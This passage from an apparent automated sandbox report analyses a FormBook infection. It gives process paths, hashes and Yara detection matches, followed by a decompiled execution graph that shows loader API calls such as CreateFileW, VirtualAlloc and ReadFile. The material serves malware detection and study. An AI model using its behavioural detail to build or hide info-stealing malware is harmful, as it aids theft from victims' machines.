                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:04:24:05
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe"
                                                                              Imagebase:0x130000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:04:24:07
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\SysWOW64\verclsid.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\verclsid.exe"
                                                                              Imagebase:0x8a0000
                                                                              File size:11'776 bytes
                                                                              MD5 hash:190A347DF06F8486F193ADA0E90B49C5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:7
                                                                              Start time:04:24:21
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe"
                                                                              Imagebase:0x130000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:04:24:32
                                                                              Start date:14/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x130000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:2.7%
                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                Signature Coverage:3.5%
                                                                                Total number of Nodes:1634
                                                                                Total number of Limit Nodes:44
                                                                                execution_graph 95029 45dee5 95032 45b710 95029->95032 95033 45b72b 95032->95033 95034 4a00f8 95033->95034 95035 4a0146 95033->95035 95058 45b750 95033->95058 95038 4a0102 95034->95038 95041 4a010f 95034->95041 95034->95058 95098 4d58a2 207 API calls 2 library calls 95035->95098 95096 4d5d33 207 API calls 95038->95096 95059 45ba20 95041->95059 95097 4d61d0 207 API calls 2 library calls 95041->95097 95044 4a03d9 95044->95044 95046 45bbe0 40 API calls 95046->95058 95048 46d336 40 API calls 95048->95058 95050 45ba4e 95051 4a0322 95105 4d5c0c 82 API calls 95051->95105 95058->95046 95058->95048 95058->95050 95058->95051 95058->95059 95063 45ec40 95058->95063 95087 45a81b 41 API calls 95058->95087 95088 46d2f0 40 API calls 95058->95088 95089 46a01b 207 API calls 95058->95089 95090 470242 5 API calls __Init_thread_wait 95058->95090 95091 46edcd 22 API calls 95058->95091 95092 4700a3 29 API calls __onexit 95058->95092 95093 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95058->95093 95094 46ee53 82 API calls 95058->95094 95095 46e5ca 207 API calls 95058->95095 95099 45aceb 23 API calls ISource 95058->95099 95100 4af6bf 23 API calls 95058->95100 95101 45a8c7 95058->95101 95059->95050 95106 4c359c 82 API calls __wsopen_s 95059->95106 95068 45ec76 ISource 95063->95068 95064 46fddb 22 API calls 95064->95068 95065 4a4beb 95112 4c359c 82 API calls __wsopen_s 95065->95112 95067 45fef7 95069 45ed9d ISource 95067->95069 95074 45a8c7 22 API calls 95067->95074 95068->95064 95068->95065 95068->95067 95068->95069 95071 4a4b0b 95068->95071 95072 45a8c7 22 API calls 95068->95072 95075 4a4600 95068->95075 95079 470242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95068->95079 95080 45fbe3 95068->95080 95081 45a961 22 API calls 95068->95081 95083 4700a3 29 API calls pre_c_initialization 95068->95083 95085 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95068->95085 95086 45f3ae ISource 95068->95086 95107 4601e0 207 API calls 2 library calls 95068->95107 95108 4606a0 41 API calls ISource 95068->95108 95069->95058 95110 4c359c 82 API calls __wsopen_s 95071->95110 95072->95068 95074->95069 95075->95069 95078 45a8c7 22 API calls 95075->95078 95078->95069 95079->95068 95080->95069 95082 4a4bdc 95080->95082 95080->95086 95081->95068 95111 4c359c 82 API calls __wsopen_s 95082->95111 95083->95068 95085->95068 95086->95069 95109 4c359c 82 API calls __wsopen_s 95086->95109 95087->95058 95088->95058 95089->95058 95090->95058 95091->95058 95092->95058 95093->95058 95094->95058 95095->95058 95096->95041 95097->95059 95098->95058 95099->95058 95100->95058 95102 45a8ea __fread_nolock 95101->95102 95103 45a8db 95101->95103 95102->95058 95103->95102 95113 46fe0b 95103->95113 95105->95059 95106->95044 95107->95068 95108->95068 95109->95069 95110->95069 95111->95065 95112->95069 95115 46fddb 95113->95115 95116 46fdfa 95115->95116 95119 46fdfc 95115->95119 95123 47ea0c 95115->95123 95130 474ead 7 API calls 2 library calls 95115->95130 95116->95102 95118 47066d 95132 4732a4 RaiseException 95118->95132 95119->95118 95131 4732a4 RaiseException 95119->95131 95121 47068a 95121->95102 95128 483820 _abort 95123->95128 95124 48385e 95134 47f2d9 20 API calls _abort 95124->95134 95126 483849 RtlAllocateHeap 95127 48385c 95126->95127 95126->95128 95127->95115 95128->95124 95128->95126 95133 474ead 7 API calls 2 library calls 95128->95133 95130->95115 95131->95118 95132->95121 95133->95128 95134->95127 95135 451044 95140 4510f3 95135->95140 95137 45104a 95176 4700a3 29 API calls __onexit 95137->95176 95139 451054 95177 451398 95140->95177 95144 45116a 95187 45a961 95144->95187 95147 45a961 22 API calls 95148 45117e 95147->95148 95149 45a961 22 API calls 95148->95149 95150 451188 95149->95150 95151 45a961 22 API calls 95150->95151 95152 4511c6 95151->95152 95153 45a961 22 API calls 95152->95153 95154 451292 95153->95154 95192 45171c 95154->95192 95158 4512c4 95159 45a961 22 API calls 95158->95159 95160 4512ce 95159->95160 95213 461940 95160->95213 95162 4512f9 95223 451aab 95162->95223 95164 451315 95165 451325 GetStdHandle 95164->95165 95166 492485 95165->95166 95167 45137a 95165->95167 95166->95167 95168 49248e 95166->95168 95170 451387 OleInitialize 95167->95170 95230 46fddb 95168->95230 95170->95137 95171 492495 95240 4c011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95171->95240 95173 49249e 95241 4c0944 CreateThread 95173->95241 95175 4924aa CloseHandle 95175->95167 95176->95139 95242 4513f1 95177->95242 95180 4513f1 22 API calls 95181 4513d0 95180->95181 95182 45a961 22 API calls 95181->95182 95183 4513dc 95182->95183 95249 456b57 95183->95249 95185 451129 95186 451bc3 6 API calls 95185->95186 95186->95144 95188 46fe0b 22 API calls 95187->95188 95189 45a976 95188->95189 95190 46fddb 22 API calls 95189->95190 95191 451174 95190->95191 95191->95147 95193 45a961 22 API calls 95192->95193 95194 45172c 95193->95194 95195 45a961 22 API calls 95194->95195 95196 451734 95195->95196 95197 45a961 22 API calls 95196->95197 95198 45174f 95197->95198 95199 46fddb 22 API calls 95198->95199 95200 45129c 95199->95200 95201 451b4a 95200->95201 95202 451b58 95201->95202 95203 45a961 22 API calls 95202->95203 95204 451b63 95203->95204 95205 45a961 22 API calls 95204->95205 95206 451b6e 95205->95206 95207 45a961 22 API calls 95206->95207 95208 451b79 95207->95208 95209 45a961 22 API calls 95208->95209 95210 451b84 95209->95210 95211 46fddb 22 API calls 95210->95211 95212 451b96 RegisterWindowMessageW 95211->95212 95212->95158 95214 461981 95213->95214 95215 46195d 95213->95215 95272 470242 5 API calls __Init_thread_wait 95214->95272 95222 46196e 95215->95222 95274 470242 5 API calls __Init_thread_wait 95215->95274 95218 46198b 95218->95215 95273 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95218->95273 95219 468727 95219->95222 95275 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95219->95275 95222->95162 95224 49272d 95223->95224 95225 451abb 95223->95225 95276 4c3209 23 API calls 95224->95276 95226 46fddb 22 API calls 95225->95226 95228 451ac3 95226->95228 95228->95164 95229 492738 95232 46fde0 95230->95232 95231 47ea0c ___std_exception_copy 21 API calls 95231->95232 95232->95231 95233 46fdfa 95232->95233 95235 46fdfc 95232->95235 95277 474ead 7 API calls 2 library calls 95232->95277 95233->95171 95239 47066d 95235->95239 95278 4732a4 RaiseException 95235->95278 95237 47068a 95237->95171 95279 4732a4 RaiseException 95239->95279 95240->95173 95241->95175 95280 4c092a 28 API calls 95241->95280 95243 45a961 22 API calls 95242->95243 95244 4513fc 95243->95244 95245 45a961 22 API calls 95244->95245 95246 451404 95245->95246 95247 45a961 22 API calls 95246->95247 95248 4513c6 95247->95248 95248->95180 95250 456b67 _wcslen 95249->95250 95251 494ba1 95249->95251 95254 456ba2 95250->95254 95255 456b7d 95250->95255 95262 4593b2 95251->95262 95253 494baa 95253->95253 95256 46fddb 22 API calls 95254->95256 95261 456f34 22 API calls 95255->95261 95258 456bae 95256->95258 95259 46fe0b 22 API calls 95258->95259 95260 456b85 __fread_nolock 95259->95260 95260->95185 95261->95260 95263 4593c0 95262->95263 95264 4593c9 __fread_nolock 95262->95264 95263->95264 95266 45aec9 95263->95266 95264->95253 95267 45aedc 95266->95267 95271 45aed9 __fread_nolock 95266->95271 95268 46fddb 22 API calls 95267->95268 95269 45aee7 95268->95269 95270 46fe0b 22 API calls 95269->95270 95270->95271 95271->95264 95272->95218 95273->95215 95274->95219 95275->95222 95276->95229 95277->95232 95278->95239 95279->95237 95281 452de3 95282 452df0 __wsopen_s 95281->95282 95283 492c2b ___scrt_fastfail 95282->95283 95284 452e09 95282->95284 95286 492c47 GetOpenFileNameW 95283->95286 95297 453aa2 95284->95297 95288 492c96 95286->95288 95290 456b57 22 API calls 95288->95290 95292 492cab 95290->95292 95292->95292 95294 452e27 95325 4544a8 95294->95325 95355 491f50 95297->95355 95300 453ace 95302 456b57 22 API calls 95300->95302 95301 453ae9 95361 45a6c3 95301->95361 95304 453ada 95302->95304 95357 4537a0 95304->95357 95307 452da5 95308 491f50 __wsopen_s 95307->95308 95309 452db2 GetLongPathNameW 95308->95309 95310 456b57 22 API calls 95309->95310 95311 452dda 95310->95311 95312 453598 95311->95312 95313 45a961 22 API calls 95312->95313 95314 4535aa 95313->95314 95315 453aa2 23 API calls 95314->95315 95316 4535b5 95315->95316 95317 4932eb 95316->95317 95318 4535c0 95316->95318 95323 49330d 95317->95323 95379 46ce60 41 API calls 95317->95379 95367 45515f 95318->95367 95324 4535df 95324->95294 95380 454ecb 95325->95380 95328 493833 95402 4c2cf9 95328->95402 95329 454ecb 94 API calls 95331 4544e1 95329->95331 95331->95328 95333 4544e9 95331->95333 95332 493848 95334 493869 95332->95334 95335 49384c 95332->95335 95337 4544f5 95333->95337 95338 493854 95333->95338 95336 46fe0b 22 API calls 95334->95336 95446 454f39 95335->95446 95351 4938ae 95336->95351 95445 45940c 136 API calls 2 library calls 95337->95445 95452 4bda5a 82 API calls 95338->95452 95342 493862 95342->95334 95343 452e31 95344 493a5f 95349 493a67 95344->95349 95345 454f39 68 API calls 95345->95349 95349->95345 95455 4b989b 82 API calls __wsopen_s 95349->95455 95351->95344 95351->95349 95352 459cb3 22 API calls 95351->95352 95428 4b967e 95351->95428 95431 45a4a1 95351->95431 95439 453ff7 95351->95439 95453 4b95ad 42 API calls _wcslen 95351->95453 95454 4c0b5a 22 API calls 95351->95454 95352->95351 95356 453aaf GetFullPathNameW 95355->95356 95356->95300 95356->95301 95358 4537ae 95357->95358 95359 4593b2 22 API calls 95358->95359 95360 452e12 95359->95360 95360->95307 95362 45a6d0 95361->95362 95363 45a6dd 95361->95363 95362->95304 95364 46fddb 22 API calls 95363->95364 95365 45a6e7 95364->95365 95366 46fe0b 22 API calls 95365->95366 95366->95362 95368 45516e 95367->95368 95372 45518f __fread_nolock 95367->95372 95370 46fe0b 22 API calls 95368->95370 95369 46fddb 22 API calls 95371 4535cc 95369->95371 95370->95372 95373 4535f3 95371->95373 95372->95369 95374 453605 95373->95374 95378 453624 __fread_nolock 95373->95378 95376 46fe0b 22 API calls 95374->95376 95375 46fddb 22 API calls 95377 45363b 95375->95377 95376->95378 95377->95324 95378->95375 95379->95317 95456 454e90 LoadLibraryA 95380->95456 95385 454ef6 LoadLibraryExW 95464 454e59 LoadLibraryA 95385->95464 95386 493ccf 95387 454f39 68 API calls 95386->95387 95389 493cd6 95387->95389 95392 454e59 3 API calls 95389->95392 95395 493cde 95392->95395 95393 454f20 95394 454f2c 95393->95394 95393->95395 95396 454f39 68 API calls 95394->95396 95486 4550f5 95395->95486 95398 4544cd 95396->95398 95398->95328 95398->95329 95401 493d05 95403 4c2d15 95402->95403 95404 45511f 64 API calls 95403->95404 95405 4c2d29 95404->95405 95636 4c2e66 95405->95636 95408 4550f5 40 API calls 95409 4c2d56 95408->95409 95410 4550f5 40 API calls 95409->95410 95411 4c2d66 95410->95411 95412 4550f5 40 API calls 95411->95412 95413 4c2d81 95412->95413 95414 4550f5 40 API calls 95413->95414 95415 4c2d9c 95414->95415 95416 45511f 64 API calls 95415->95416 95417 4c2db3 95416->95417 95418 47ea0c ___std_exception_copy 21 API calls 95417->95418 95419 4c2dba 95418->95419 95420 47ea0c ___std_exception_copy 21 API calls 95419->95420 95421 4c2dc4 95420->95421 95422 4550f5 40 API calls 95421->95422 95423 4c2dd8 95422->95423 95424 4c28fe 27 API calls 95423->95424 95425 4c2dee 95424->95425 95427 4c2d3f 95425->95427 95642 4c22ce 95425->95642 95427->95332 95429 46fe0b 22 API calls 95428->95429 95430 4b96ae __fread_nolock 95429->95430 95430->95351 95432 45a52b 95431->95432 95436 45a4b1 __fread_nolock 95431->95436 95434 46fe0b 22 API calls 95432->95434 95433 46fddb 22 API calls 95435 45a4b8 95433->95435 95434->95436 95437 46fddb 22 API calls 95435->95437 95438 45a4d6 95435->95438 95436->95433 95437->95438 95438->95351 95440 4540ae 95439->95440 95441 45400a 95439->95441 95440->95351 95443 46fe0b 22 API calls 95441->95443 95444 45403c 95441->95444 95442 46fddb 22 API calls 95442->95444 95443->95444 95444->95440 95444->95442 95445->95343 95447 454f43 95446->95447 95451 454f4a 95446->95451 95448 47e678 67 API calls 95447->95448 95448->95451 95449 454f59 95449->95338 95450 454f6a FreeLibrary 95450->95449 95451->95449 95451->95450 95452->95342 95453->95351 95454->95351 95455->95349 95457 454ec6 95456->95457 95458 454ea8 GetProcAddress 95456->95458 95461 47e5eb 95457->95461 95459 454eb8 95458->95459 95459->95457 95460 454ebf FreeLibrary 95459->95460 95460->95457 95494 47e52a 95461->95494 95463 454eea 95463->95385 95463->95386 95465 454e8d 95464->95465 95466 454e6e GetProcAddress 95464->95466 95469 454f80 95465->95469 95467 454e7e 95466->95467 95467->95465 95468 454e86 FreeLibrary 95467->95468 95468->95465 95470 46fe0b 22 API calls 95469->95470 95471 454f95 95470->95471 95562 455722 95471->95562 95473 454fa1 __fread_nolock 95474 4550a5 95473->95474 95475 493d1d 95473->95475 95485 454fdc 95473->95485 95565 4542a2 CreateStreamOnHGlobal 95474->95565 95576 4c304d 74 API calls 95475->95576 95478 493d22 95480 45511f 64 API calls 95478->95480 95479 4550f5 40 API calls 95479->95485 95481 493d45 95480->95481 95482 4550f5 40 API calls 95481->95482 95484 45506e ISource 95482->95484 95484->95393 95485->95478 95485->95479 95485->95484 95571 45511f 95485->95571 95487 455107 95486->95487 95488 493d70 95486->95488 95598 47e8c4 95487->95598 95491 4c28fe 95619 4c274e 95491->95619 95493 4c2919 95493->95401 95496 47e536 __FrameHandler3::FrameUnwindToState 95494->95496 95495 47e544 95519 47f2d9 20 API calls _abort 95495->95519 95496->95495 95498 47e574 95496->95498 95500 47e586 95498->95500 95501 47e579 95498->95501 95499 47e549 95520 4827ec 26 API calls __wsopen_s 95499->95520 95511 488061 95500->95511 95521 47f2d9 20 API calls _abort 95501->95521 95505 47e58f 95506 47e595 95505->95506 95507 47e5a2 95505->95507 95522 47f2d9 20 API calls _abort 95506->95522 95523 47e5d4 LeaveCriticalSection __fread_nolock 95507->95523 95509 47e554 __wsopen_s 95509->95463 95512 48806d __FrameHandler3::FrameUnwindToState 95511->95512 95524 482f5e EnterCriticalSection 95512->95524 95514 48807b 95525 4880fb 95514->95525 95518 4880ac __wsopen_s 95518->95505 95519->95499 95520->95509 95521->95509 95522->95509 95523->95509 95524->95514 95534 48811e 95525->95534 95526 488088 95538 4880b7 95526->95538 95527 488177 95543 484c7d 95527->95543 95532 488189 95532->95526 95556 483405 11 API calls 2 library calls 95532->95556 95534->95526 95534->95527 95541 47918d EnterCriticalSection 95534->95541 95542 4791a1 LeaveCriticalSection 95534->95542 95535 4881a8 95557 47918d EnterCriticalSection 95535->95557 95561 482fa6 LeaveCriticalSection 95538->95561 95540 4880be 95540->95518 95541->95534 95542->95534 95548 484c8a _abort 95543->95548 95544 484cca 95559 47f2d9 20 API calls _abort 95544->95559 95545 484cb5 RtlAllocateHeap 95546 484cc8 95545->95546 95545->95548 95550 4829c8 95546->95550 95548->95544 95548->95545 95558 474ead 7 API calls 2 library calls 95548->95558 95551 4829d3 RtlFreeHeap 95550->95551 95555 4829fc _free 95550->95555 95552 4829e8 95551->95552 95551->95555 95560 47f2d9 20 API calls _abort 95552->95560 95554 4829ee GetLastError 95554->95555 95555->95532 95556->95535 95557->95526 95558->95548 95559->95546 95560->95554 95561->95540 95563 46fddb 22 API calls 95562->95563 95564 455734 95563->95564 95564->95473 95566 4542bc FindResourceExW 95565->95566 95568 4542d9 95565->95568 95567 4935ba LoadResource 95566->95567 95566->95568 95567->95568 95569 4935cf SizeofResource 95567->95569 95568->95485 95569->95568 95570 4935e3 LockResource 95569->95570 95570->95568 95572 45512e 95571->95572 95575 493d90 95571->95575 95577 47ece3 95572->95577 95576->95478 95580 47eaaa 95577->95580 95579 45513c 95579->95485 95583 47eab6 __FrameHandler3::FrameUnwindToState 95580->95583 95581 47eac2 95593 47f2d9 20 API calls _abort 95581->95593 95583->95581 95584 47eae8 95583->95584 95595 47918d EnterCriticalSection 95584->95595 95585 47eac7 95594 4827ec 26 API calls __wsopen_s 95585->95594 95588 47eaf4 95596 47ec0a 62 API calls 2 library calls 95588->95596 95590 47eb08 95597 47eb27 LeaveCriticalSection __fread_nolock 95590->95597 95591 47ead2 __wsopen_s 95591->95579 95593->95585 95594->95591 95595->95588 95596->95590 95597->95591 95601 47e8e1 95598->95601 95600 455118 95600->95491 95602 47e8ed __FrameHandler3::FrameUnwindToState 95601->95602 95603 47e900 ___scrt_fastfail 95602->95603 95604 47e92d 95602->95604 95605 47e925 __wsopen_s 95602->95605 95614 47f2d9 20 API calls _abort 95603->95614 95616 47918d EnterCriticalSection 95604->95616 95605->95600 95608 47e937 95617 47e6f8 38 API calls 4 library calls 95608->95617 95609 47e91a 95615 4827ec 26 API calls __wsopen_s 95609->95615 95612 47e94e 95618 47e96c LeaveCriticalSection __fread_nolock 95612->95618 95614->95609 95615->95605 95616->95608 95617->95612 95618->95605 95622 47e4e8 95619->95622 95621 4c275d 95621->95493 95625 47e469 95622->95625 95624 47e505 95624->95621 95626 47e48c 95625->95626 95627 47e478 95625->95627 95632 47e488 __alldvrm 95626->95632 95635 48333f 11 API calls 2 library calls 95626->95635 95633 47f2d9 20 API calls _abort 95627->95633 95629 47e47d 95634 4827ec 26 API calls __wsopen_s 95629->95634 95632->95624 95633->95629 95634->95632 95635->95632 95640 4c2e7a 95636->95640 95637 4c2d3b 95637->95408 95637->95427 95638 4550f5 40 API calls 95638->95640 95639 4c28fe 27 API calls 95639->95640 95640->95637 95640->95638 95640->95639 95641 45511f 64 API calls 95640->95641 95641->95640 95643 4c22e7 95642->95643 95644 4c22d9 95642->95644 95646 4c232c 95643->95646 95647 47e5eb 29 API calls 95643->95647 95670 4c22f0 95643->95670 95645 47e5eb 29 API calls 95644->95645 95645->95643 95671 4c2557 40 API calls __fread_nolock 95646->95671 95649 4c2311 95647->95649 95649->95646 95651 4c231a 95649->95651 95650 4c2370 95652 4c2374 95650->95652 95653 4c2395 95650->95653 95651->95670 95679 47e678 95651->95679 95656 47e678 67 API calls 95652->95656 95657 4c2381 95652->95657 95672 4c2171 95653->95672 95656->95657 95659 47e678 67 API calls 95657->95659 95657->95670 95658 4c239d 95660 4c23c3 95658->95660 95661 4c23a3 95658->95661 95659->95670 95692 4c23f3 74 API calls 95660->95692 95663 4c23b0 95661->95663 95664 47e678 67 API calls 95661->95664 95665 47e678 67 API calls 95663->95665 95663->95670 95664->95663 95665->95670 95666 4c23de 95669 47e678 67 API calls 95666->95669 95666->95670 95667 4c23ca 95667->95666 95668 47e678 67 API calls 95667->95668 95668->95666 95669->95670 95670->95427 95671->95650 95673 47ea0c ___std_exception_copy 21 API calls 95672->95673 95674 4c217f 95673->95674 95675 47ea0c ___std_exception_copy 21 API calls 95674->95675 95676 4c2190 95675->95676 95677 47ea0c ___std_exception_copy 21 API calls 95676->95677 95678 4c219c 95677->95678 95678->95658 95680 47e684 __FrameHandler3::FrameUnwindToState 95679->95680 95681 47e695 95680->95681 95682 47e6aa 95680->95682 95710 47f2d9 20 API calls _abort 95681->95710 95690 47e6a5 __wsopen_s 95682->95690 95693 47918d EnterCriticalSection 95682->95693 95684 47e69a 95711 4827ec 26 API calls __wsopen_s 95684->95711 95687 47e6c6 95694 47e602 95687->95694 95689 47e6d1 95712 47e6ee LeaveCriticalSection __fread_nolock 95689->95712 95690->95670 95692->95667 95693->95687 95695 47e624 95694->95695 95696 47e60f 95694->95696 95702 47e61f 95695->95702 95713 47dc0b 95695->95713 95745 47f2d9 20 API calls _abort 95696->95745 95698 47e614 95746 4827ec 26 API calls __wsopen_s 95698->95746 95702->95689 95706 47e646 95730 48862f 95706->95730 95709 4829c8 _free 20 API calls 95709->95702 95710->95684 95711->95690 95712->95690 95714 47dc23 95713->95714 95716 47dc1f 95713->95716 95715 47d955 __fread_nolock 26 API calls 95714->95715 95714->95716 95717 47dc43 95715->95717 95719 484d7a 95716->95719 95747 4859be 62 API calls 4 library calls 95717->95747 95720 484d90 95719->95720 95721 47e640 95719->95721 95720->95721 95722 4829c8 _free 20 API calls 95720->95722 95723 47d955 95721->95723 95722->95721 95724 47d976 95723->95724 95725 47d961 95723->95725 95724->95706 95748 47f2d9 20 API calls _abort 95725->95748 95727 47d966 95749 4827ec 26 API calls __wsopen_s 95727->95749 95729 47d971 95729->95706 95731 48863e 95730->95731 95732 488653 95730->95732 95753 47f2c6 20 API calls _abort 95731->95753 95734 48868e 95732->95734 95738 48867a 95732->95738 95755 47f2c6 20 API calls _abort 95734->95755 95735 488643 95754 47f2d9 20 API calls _abort 95735->95754 95750 488607 95738->95750 95739 488693 95756 47f2d9 20 API calls _abort 95739->95756 95742 47e64c 95742->95702 95742->95709 95743 48869b 95757 4827ec 26 API calls __wsopen_s 95743->95757 95745->95698 95746->95702 95747->95716 95748->95727 95749->95729 95758 488585 95750->95758 95752 48862b 95752->95742 95753->95735 95754->95742 95755->95739 95756->95743 95757->95742 95759 488591 __FrameHandler3::FrameUnwindToState 95758->95759 95769 485147 EnterCriticalSection 95759->95769 95761 48859f 95762 4885d1 95761->95762 95763 4885c6 95761->95763 95785 47f2d9 20 API calls _abort 95762->95785 95770 4886ae 95763->95770 95766 4885cc 95786 4885fb LeaveCriticalSection __wsopen_s 95766->95786 95768 4885ee __wsopen_s 95768->95752 95769->95761 95787 4853c4 95770->95787 95772 4886c4 95800 485333 21 API calls 3 library calls 95772->95800 95774 4886be 95774->95772 95775 4886f6 95774->95775 95776 4853c4 __wsopen_s 26 API calls 95774->95776 95775->95772 95777 4853c4 __wsopen_s 26 API calls 95775->95777 95779 4886ed 95776->95779 95780 488702 CloseHandle 95777->95780 95778 48871c 95781 48873e 95778->95781 95801 47f2a3 20 API calls 2 library calls 95778->95801 95782 4853c4 __wsopen_s 26 API calls 95779->95782 95780->95772 95783 48870e GetLastError 95780->95783 95781->95766 95782->95775 95783->95772 95785->95766 95786->95768 95788 4853d1 95787->95788 95789 4853e6 95787->95789 95790 47f2c6 __dosmaperr 20 API calls 95788->95790 95791 47f2c6 __dosmaperr 20 API calls 95789->95791 95793 48540b 95789->95793 95792 4853d6 95790->95792 95794 485416 95791->95794 95795 47f2d9 _free 20 API calls 95792->95795 95793->95774 95796 47f2d9 _free 20 API calls 95794->95796 95797 4853de 95795->95797 95798 48541e 95796->95798 95797->95774 95799 4827ec __wsopen_s 26 API calls 95798->95799 95799->95797 95800->95778 95801->95781 95802 1572910 95816 1570560 95802->95816 95804 15729b1 95819 1572800 95804->95819 95806 15729da CreateFileW 95808 1572a2e 95806->95808 95809 1572a29 95806->95809 95808->95809 95810 1572a45 VirtualAlloc 95808->95810 95810->95809 95811 1572a63 ReadFile 95810->95811 95811->95809 95812 1572a7e 95811->95812 95813 1571800 13 API calls 95812->95813 95814 1572ab1 95813->95814 95815 1572ad4 ExitProcess 95814->95815 95815->95809 95818 1570beb 95816->95818 95822 15739e0 GetPEB 95816->95822 95818->95804 95820 1572809 Sleep 95819->95820 95821 1572817 95820->95821 95822->95818 95823 451cad SystemParametersInfoW 95824 488402 95829 4881be 95824->95829 95828 48842a 95834 4881ef try_get_first_available_module 95829->95834 95831 4883ee 95848 4827ec 26 API calls __wsopen_s 95831->95848 95833 488343 95833->95828 95841 490984 95833->95841 95840 488338 95834->95840 95844 478e0b 40 API calls 2 library calls 95834->95844 95836 48838c 95836->95840 95845 478e0b 40 API calls 2 library calls 95836->95845 95838 4883ab 95838->95840 95846 478e0b 40 API calls 2 library calls 95838->95846 95840->95833 95847 47f2d9 20 API calls _abort 95840->95847 95849 490081 95841->95849 95843 49099f 95843->95828 95844->95836 95845->95838 95846->95840 95847->95831 95848->95833 95851 49008d __FrameHandler3::FrameUnwindToState 95849->95851 95850 49009b 95906 47f2d9 20 API calls _abort 95850->95906 95851->95850 95853 4900d4 95851->95853 95860 49065b 95853->95860 95854 4900a0 95907 4827ec 26 API calls __wsopen_s 95854->95907 95859 4900aa __wsopen_s 95859->95843 95861 490678 95860->95861 95862 49068d 95861->95862 95863 4906a6 95861->95863 95923 47f2c6 20 API calls _abort 95862->95923 95909 485221 95863->95909 95866 4906ab 95867 4906cb 95866->95867 95868 4906b4 95866->95868 95922 49039a CreateFileW 95867->95922 95925 47f2c6 20 API calls _abort 95868->95925 95872 4900f8 95908 490121 LeaveCriticalSection __wsopen_s 95872->95908 95873 4906b9 95926 47f2d9 20 API calls _abort 95873->95926 95875 490781 GetFileType 95876 49078c GetLastError 95875->95876 95877 4907d3 95875->95877 95929 47f2a3 20 API calls 2 library calls 95876->95929 95931 48516a 21 API calls 3 library calls 95877->95931 95878 490692 95924 47f2d9 20 API calls _abort 95878->95924 95879 490756 GetLastError 95928 47f2a3 20 API calls 2 library calls 95879->95928 95880 490704 95880->95875 95880->95879 95927 49039a CreateFileW 95880->95927 95884 49079a CloseHandle 95884->95878 95887 4907c3 95884->95887 95886 490749 95886->95875 95886->95879 95930 47f2d9 20 API calls _abort 